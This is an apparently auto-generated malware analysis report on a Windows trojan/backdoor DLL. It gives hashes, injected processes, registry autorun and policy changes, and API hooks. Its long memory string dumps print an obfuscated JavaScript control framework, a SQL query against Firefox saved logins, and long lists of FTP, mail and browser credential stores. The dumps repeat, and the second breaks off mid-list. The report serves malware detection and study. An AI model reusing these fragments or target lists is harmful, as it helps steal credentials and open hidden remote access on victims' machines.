Gen.Variant.Kazy.371705_f58394595d

by malwarelabrobot on December 13th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.371705 (B) (Emsisoft), Gen:Variant.Kazy.371705 (AdAware), GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f58394595d82cbf96246144a7cf8b94a
SHA1: 962ba6311c6796403dfb2a439d2f84f9f761d465
SHA256: eb9a033c672096607853e7bdc5e78de4777b0de7c0a3b92af0e0175d87236a6b
SSDeep: 6144:096natTkZ3KuljRzGdjyY8gPY3zB8 koYpZo4TP4ZEOZ1HuWl:0BBP4jRzYlgDC koYpSjE5Wl
Size: 408240 bytes
File type: DLL
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: app
Created at: 2007-08-04 18:12:59
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:1360

The Trojan injects its code into the following process(es):

imapi.exe:1780
vmacthlp.exe:928
wmiprvse.exe:844
Explorer.EXE:880
spoolsv.exe:1444
jqs.exe:1976

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process regsvr32.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\wzbrwgd.dat (281 bytes)

Registry activity

The process regsvr32.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 76 12 CB 49 9B 26 C0 E1 9E 55 02 72 66 8E 52"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
"DefaultLevel" = "262144"

[HKCU\Software\Classes\CLSID\{7BD47FDD-1028-4944-A268-024C76A61BA9}]
"#sd" = "63 3A 5C 66 35 38 33 39 34 35 39 35 64 38 32 63"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
"PolicyScope" = "0"

"TransparentEnabled" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"wzbrwgd" = "regsvr32.exe %Documents and Settings%\All Users\Application Data\wzbrwgd.dat"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths]
[HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}]

The process vmacthlp.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Classes\CLSID\{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}]
"{4E153850-602D-4819-B83D-3CCD0A1E7351}" = "15 B3 99 DC"

Dropped PE files

MD5 File path
2403d3beb0e8b080419ac675df68c4bb c:\Documents and Settings\All Users\Application Data\wzbrwgd.dat

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateProcessA
CreateProcessW

Propagation

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.0.6000.16386
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: SystemPropertiesDataExecutionPrevention.EXE
Internal Name: SystemPropertiesDataExecutionPrevention
File Version: 6.0.6000.16386 (vista_rtm.061101-2205)
File Description: Change Data Execution Prevention Settings
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 42112 43008 4.70972 dc68539b7ac0bd8abe09c0aa6b601cda
.rdata 49152 30563 30720 3.01221 fbf249f3a0819d3b359653c78d606826
.data 81920 196804 4096 3.1251 bb5fc71fe758d745761a2b2ea5722ee2
.rsrc 282624 74032 74752 5.02105 f32ad39651b99076bdaa4cbe1f40512b
.reloc 360448 1076 2048 1.224 bdcd67565f312204d3fa1202c26fe860

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
9746f055dd1f544cd4365d6c9afd0884

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the folowing location(s):

wmiprvse.exe_844_rwx_00DD0000_0004E000:

%Documents and Settings%\All Users\Application Data\wzbrwgd.dat
.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

wmiprvse.exe_844_rwx_01040000_00078000:

.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
